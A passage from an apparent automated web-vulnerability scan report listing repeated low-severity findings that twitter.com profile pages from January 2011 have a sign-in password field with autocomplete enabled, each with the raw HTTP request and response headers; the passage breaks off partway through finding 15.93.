Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910347880108; path=/; expires=Mon, 31-Jan-11 23:05:47 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034914123817; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlN2Q0ZTFiOTJmMGY0NmRjMTgyZTZkMjQ3ZTFlMjE1%250ANTk6DnJldHVybl90byImaHR0cDovL3R3aXR0ZXIuY29tLzdOZXdzL25ld3N0%250AZWFtOgdpZCIlZDI1NjgyOTUxYTU1YzRjZDc1MzNiNTE3NWVjOTllMGUiCmZs%250AYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6%250ACkB1c2VkewA6D2NyZWF0ZWRfYXRsKwhXqUa6LQE%253D--b059b0e115ff03027e8577c5a6c0808a3211765e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="1b91c04dd6ff02fcee77cc1866295f3e0edd006e" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.82. http://twitter.com/7news

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /7news

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /7news HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:05:49 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910349-40880-22216
ETag: "edad7aa55a25b6aec0246521dae3ab7a"
Last-Modified: Mon, 24 Jan 2011 23:05:49 GMT
X-Runtime: 0.01998
Content-Type: text/html; charset=utf-8
Content-Length: 53571
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910349075016; path=/; expires=Mon, 31-Jan-11 23:05:49 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591034994189809; path=/; expires=Wed, 23 Feb 2011 23:05:49 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTAyYzE2NTMwZmE0YWY2ZTAyMTAxMDJmMGU0YTQzZmQ2Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsId6xGui0B--4e6b29308b59767c1b05d40af6b5c28ee7725ec0; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="30daed80dc3054c82b177642dfafd527d124f6ee" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.83. http://twitter.com/LizPW/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /LizPW/

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /LizPW/ HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:10:21 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910621-77895-31155
ETag: "c259f1b8d242bd50582934993f0c6970"
Last-Modified: Mon, 24 Jan 2011 23:10:21 GMT
X-Runtime: 0.01511
Content-Type: text/html; charset=utf-8
Content-Length: 51420
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910621396653; path=/; expires=Mon, 31-Jan-11 23:10:21 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591062196529909; path=/; expires=Wed, 23 Feb 2011 23:10:21 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWRlMWQ2NzdlN2Y2ZTU0NGM4ZWEyNTMyMWY1ZTk3YzU0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsID9NKui0B--e7abc610de60e62983759c4d12e8f2cf3eede5ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="fc87d77eafb1c9a092375a34195958826ad7e651" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.84. http://twitter.com/cw56

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /cw56

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /cw56 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:46 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910406-20060-45194
ETag: "ff97e4d20929a3ffbfd77d3c60c548db"
Last-Modified: Mon, 24 Jan 2011 23:06:46 GMT
X-Runtime: 0.00997
Content-Type: text/html; charset=utf-8
Content-Length: 55430
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910405466703; path=/; expires=Mon, 31-Jan-11 23:06:45 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591040641745365; path=/; expires=Wed, 23 Feb 2011 23:06:46 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWQwY2JkYzRhMmU2ZTBjZWZhNmNiYWE3MTYzNTNkNDVkIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIE4lHui0B--3cac94f8557ed984265e75e9f4c719f681987c10; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="5be2144bfac0a2b0cb28c7cc29b0ee1905ffeac6" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.85. http://twitter.com/datasift

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /datasift

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /datasift HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:50 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964110-52502-21616
ETag: "98dfab6f65418ae81b99a43c3a15ba6b"
Last-Modified: Tue, 25 Jan 2011 14:01:50 GMT
X-Runtime: 0.41713
Content-Type: text/html; charset=utf-8
Content-Length: 46413
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964108154865; path=/; expires=Tue, 01-Feb-11 14:01:48 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596411037165831; path=/; expires=Thu, 24 Feb 2011 14:01:50 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNWEwYzM3OTNmYjE1ZjAwZDgyZTA4NTA1Y2ZiMGJh%250AZDU6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL2RhdGFzaWZ0Ogdp%250AZCIlNTM1ZTA1NTY3NDFkOGQ5Zjk2ZGQ2NjkwMWQ2NTA1NTciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgl%252Fnq9LQE%253D--53648523a8885e6e9f30528d0faecbf003a6ff95; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="e70bfa26abb625d5f91ba2867247832dddb8368d" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.86. http://twitter.com/joomla

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /joomla

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /joomla HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 16:02:38 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295884958-68881-31789
ETag: "ae3f2c47aa619b0820a141db6a6acfae"
Last-Modified: Mon, 24 Jan 2011 16:02:38 GMT
X-Runtime: 0.01322
Content-Type: text/html; charset=utf-8
Content-Length: 53726
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295884958395114; path=/; expires=Mon, 31-Jan-11 16:02:38 GMT; domain=.twitter.com
Set-Cookie: guest_id=129588495844059611; path=/; expires=Wed, 23 Feb 2011 16:02:38 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCOo6w7gtAToHaWQiJTFmN2YyYzU0MmRhYmY4%250AZWYyNDc4ZWFmY2M4MmYwNjIwIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--724d5a6fe81e3fe03c41751c53520bd5bc139e61; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="189b78c63ad7d32918d80169706495a69a873104" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.87. http://twitter.com/kontentdesign

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /kontentdesign

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /kontentdesign HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964127-50745-17441
ETag: "63815a5d05a1b95386102d34a0650082"
Last-Modified: Tue, 25 Jan 2011 14:02:07 GMT
X-Runtime: 0.01446
Content-Type: text/html; charset=utf-8
Content-Length: 52448
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964125413234; path=/; expires=Tue, 01-Feb-11 14:02:05 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412736246980; path=/; expires=Thu, 24 Feb 2011 14:02:07 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTcyODA1NmExZmQ1MDE5ZTUzYjYyYjQ0NjQzMDVjYjkxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIhEB7vS0B--951e0307ecaa4357ec02a6a302e57cf685286962; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="5921826199e5f25f765a4dd09d8085ffd5914eb8" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.88. http://twitter.com/nbc/primetime

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /nbc/primetime

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /nbc/primetime HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 23:06:59 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295910418-13129-32425
ETag: "a5a44db8a71fab6b9f2580b61e51bac4"
Last-Modified: Mon, 24 Jan 2011 23:06:58 GMT
X-Runtime: 0.49830
Content-Type: text/html; charset=utf-8
Content-Length: 57012
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295910418725856; path=/; expires=Mon, 31-Jan-11 23:06:58 GMT; domain=.twitter.com
Set-Cookie: guest_id=129591041889118308; path=/; expires=Wed, 23 Feb 2011 23:06:58 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYWNhY2QyMDk5NWYxMWM2MjRjNGQ0NDdhYTA1ZTQ3%250AYzA6DnJldHVybl90byIlaHR0cDovL3R3aXR0ZXIuY29tL25iYy9wcmltZXRp%250AbWU6B2lkIiU0NDZjYzZhOTY2NmJmZTZlZjQ3OGQ5ZGIyYmQxYzRiMCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCM25R7otAQ%253D%253D--d1e94695604015df0d84f87d3e421b29e16e392e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="c7f404ddc4078feffab8324e4849dfde0a1cd943" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.89. http://twitter.com/netlingo

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /netlingo

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /netlingo HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964123-67769-3429
ETag: "8ed7c55c146db619fdf925948244e6a4"
Last-Modified: Tue, 25 Jan 2011 14:02:03 GMT
X-Runtime: 0.57870
Content-Type: text/html; charset=utf-8
Content-Length: 48756
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964121273602; path=/; expires=Tue, 01-Feb-11 14:02:01 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596412316680845; path=/; expires=Thu, 24 Feb 2011 14:02:03 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlNGZlYmY1Yjc5NTA0ZjkwYmIwMWI5OGEyZDMyZTM1%250AYjk6DnJldHVybl90byIgaHR0cDovL3R3aXR0ZXIuY29tL25ldGxpbmdvOgdp%250AZCIlNDAzOGVkNGRhYjIyMmJkOGY3ZGY1YjQzNjEzOWM1MDciCmZsYXNoSUM6%250AJ0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2Vk%250AewA6D2NyZWF0ZWRfYXRsKwgfMHu9LQE%253D--a495d11ca78d3b4eafce746e4006ed9d057939a8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="b300943fab3122b87ecf85f0eb426b978e47dbbb" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.90. http://twitter.com/spies_assassins

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /spies_assassins

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /spies_assassins HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9198-19132
ETag: "d25862c279dba6cd1e553cac20d22d67"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.81721
Content-Type: text/html; charset=utf-8
Content-Length: 53400
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064205570; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406668777691; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlOTFhMjVhMGYxN2MzNTI1ZTQ5ZmUzZjczMmNkZjE3%250AMjc6DnJldHVybl90byInaHR0cDovL3R3aXR0ZXIuY29tL3NwaWVzX2Fzc2Fz%250Ac2luczoHaWQiJTYzMTVlMzExN2JlZWI3ZTk3NzRhNmY4YzVlZGMxZGFhIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIgVN6vS0B--19cfe0462f0d48cd362b4b7b652a3c4766f21675; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="2c19aa408894b1b3a6ef17575d530616dbc7b970" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.91. http://twitter.com/tweetmeme

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /tweetmeme

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /tweetmeme HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:01:06 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964066-9478-51270
ETag: "7b585adb867e3eb6f32095f5c2866375"
Last-Modified: Tue, 25 Jan 2011 14:01:06 GMT
X-Runtime: 0.01836
Content-Type: text/html; charset=utf-8
Content-Length: 53983
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964064200831; path=/; expires=Tue, 01-Feb-11 14:01:04 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596406693798147; path=/; expires=Thu, 24 Feb 2011 14:01:06 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTJkNDc2OWNmNTUxYTAyZGE3OGM1MDcyNjFlYTA4NWNjIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIfFR6vS0B--e1050b38818ecc596cfa97ed5bb62afd0749dcd8; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="e42475c6ca7a3f4e16203ee6afdbabc2df486099" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.92. http://twitter.com/typekit

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /typekit

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /typekit HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Tue, 25 Jan 2011 14:02:12 GMT
Server: hi
Status: 200 OK
X-Transaction: 1295964132-61803-46798
ETag: "2d1d82c342cf698a8f46318662e78b68"
Last-Modified: Tue, 25 Jan 2011 14:02:12 GMT
X-Runtime: 0.01489
Content-Type: text/html; charset=utf-8
Content-Length: 43545
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1295964130260966; path=/; expires=Tue, 01-Feb-11 14:02:10 GMT; domain=.twitter.com
Set-Cookie: guest_id=129596413223631444; path=/; expires=Thu, 24 Feb 2011 14:02:12 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJWZmZDVhODg4ZjIyMmRmMGIwMmY4ZGM3MmFlYTJhNDMxIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIjlN7vS0B--f40f6aa2142d312dbf0ca41283ed8a96a762a0ed; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
<div id="signin_menu" class="common-form standard-form offscreen">

<form method="post" id="signin" action="https://twitter.com/sessions">

<input id="authenticity_token" name="authenticity_token" type="hidden" value="bd92bf9f1f0424bdc2bb7efc47bfec283564a3a5" />
...[SNIP]...
</label>
<input type="password" id="password" name="session[password]" value="" title="password" tabindex="5"/>
</p>
...[SNIP]...

15.93. http://twitter.com/ups

Summary

Severity:   Low
Confidence:   Certain
Host:   http://twitter.com
Path:   /ups

Issue detail

The page contains a form with the following action URL:
  • https://twitter.com/sessions
The form contains the following password field with autocomplete enabled:
  • session[password]

Request

GET /ups HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
